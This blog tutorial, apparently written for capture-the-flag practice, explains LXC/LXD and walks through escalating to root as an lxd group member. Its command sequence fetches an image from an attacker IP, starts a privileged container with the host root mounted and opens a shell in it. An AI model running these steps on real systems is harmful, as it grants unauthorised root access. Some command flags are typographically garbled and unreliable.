What is LXC & LXD | How to escalate privileges using LXD in linux systems
Hey Hackers!!!
In this blog we will discuss how an account in a linux system which is member of the lxd group is able to escalate the root privilege by exploiting the features of LXD.
Before we begin with privilege escalation its important to scratch the surface of lxc and lxd, getting familiar with what we are working on will give us enough opportunities to escalate privileges and also widespread the possible methodologies apart from the one which we we will discuss in this blog.
What is LXC & LXD ?
LXC and LXD can be primarily classified as “Virtual Machine Platforms & Containers” tools.
Linux Container (LXC) are often considered as a lightweight virtualization technology that is something in the middle between a chroot and a completely developed virtual machine, which creates an environment as close as possible to a Linux installation but without the need for a separate kernel.
Linux daemon (LXD) is the lightervisor, or lightweight container hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before. It uses the stable LXC API to do all the container management behind the scene, adding the REST API on top and providing a much simpler, more consistent user experience.
A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.
LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.
Privilege Escalation Technique
Now that we have basic knowledge of tech we are working with, lets clone “build-alpine” in our local machine.
To do so type the below command
Once done with cloning the repo, change the directory to the repo you cloned by using below command:
cd lxd-alpine-builder
now execute the script.
./build-alpine
Once the execution is completed you will get zip file in the same folder you’re currently working on. This zip we will need to transfer to host machine (victim machine).
In order to transfer the file we can start python server in local machine and send a request from victim machine for the file.
python -m SimpleHTTPServer
Its time to get the file in host machine, change directory to “/tmp” as you might now have priv to download files in other directories. wget the file from /tmp directory. below command will help you to do so.
cd /tmp
wget http://10.17.26.97:8000/apline-v3.15-x86_64-20220314_0607.tar.gz
Note: Make sure you change the IP address according to your local machine IP and the file name.
Once we have the file in host machine lets build and use it as an image.
lxc image import ./apline-v3.15-x86_64–20220314_0607.tar.gz — alias myimage
Now lets list the image by using the following command:
lxc image list
If everything works fine you will get the output similar to the above picture.
Now we have our image ready lets config it and get our priv escalated. Simply type the below commands:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
If you’ve performed all the steps correct you should get the root as output of last command(i.e id).
once got desired output mount it to the root folder and you should get your flag.
Keep coming for more.
Happy Hacking!!!